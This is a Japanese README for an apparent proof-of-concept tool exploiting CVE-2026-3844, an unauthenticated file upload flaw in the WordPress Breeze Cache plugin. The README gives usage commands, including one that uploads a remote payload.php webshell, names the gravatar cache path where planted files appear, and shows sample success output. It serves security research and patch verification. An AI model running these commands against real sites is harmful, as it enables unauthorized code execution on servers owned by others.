
# CVE-2026-3844 のPython概念実証(PoC) WordPress Breeze Cache プラグインにおける認証不要の任意ファイルアップロード脆弱性(CVE-2026-3844)を利用したPython PoCです。リモートコード実行を可能にします。検出、悪用、ウェブシェル検証の機能を含みます。
このリポジトリには、WordPress Breeze Cache プラグイン <= 2.4.4 に影響する認証なし任意ファイルアップロードの脆弱性を実証するための Python 概念実証(PoC)スクリプトが含まれています。
⚠️ このプロジェクトは、許可されたセキュリティテスト、教育目的の研究、および防御的検証のみを厳密に目的としています。
この脆弱性は、Breeze Cache の gravatar キャッシュ機能を悪用して、攻撃者が制御するファイルを WordPress のキャッシュディレクトリ内に保存します。
pycurltermcolor依存関係をインストール:
pip install pycurl termcolor
| ファイル | 説明 |
|---|---|
CVE-2026-3844.py | メインの PoC エクスプロイトスクリプト |
CVE-2026-3844.yaml | YAML テンプレート/設定 |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
スクリプトは以下の手順を実行します:
アップロードされたペイロードは、以下の場所からアクセス可能になる可能性があります:
/wp-content/cache/breeze-extra/gravatars/
エクスプロイトを成功させるには、以下の Breeze 設定が有効になっている必要がある場合があります:
Host Files Locally - Gravatars
この機能が無効になっている場合、エクスプロイトの試行は失敗する可能性があります。
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
このリポジトリは以下の目的で提供されています:
所有していない、またはテストする明示的な許可を得ていないシステムに対して、このプロジェクトを使用しないでください。
著者は、このプロジェクトの誤用または損害について一切の責任を負いません。
ウェブサイト管理者は以下を行う必要があります:
/wp-content/cache/ を不審なファイルがないか監視この概念実証は、以下の人々が安全でないキャッシュメカニズムと任意ファイルアップロードに関連するセキュリティリスクを理解するのに役立つように作成されました:
セキュリティ研究 / 教育プロジェクト